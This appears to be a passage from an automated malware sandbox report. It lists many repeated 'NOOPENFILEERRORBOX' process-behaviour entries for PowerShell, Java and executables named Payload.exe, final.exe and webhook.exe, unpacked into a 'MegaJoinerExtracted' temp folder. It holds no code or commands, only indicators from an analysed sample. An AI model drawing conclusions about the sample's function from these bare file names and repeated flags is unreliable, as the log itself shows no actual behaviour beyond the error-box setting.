Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
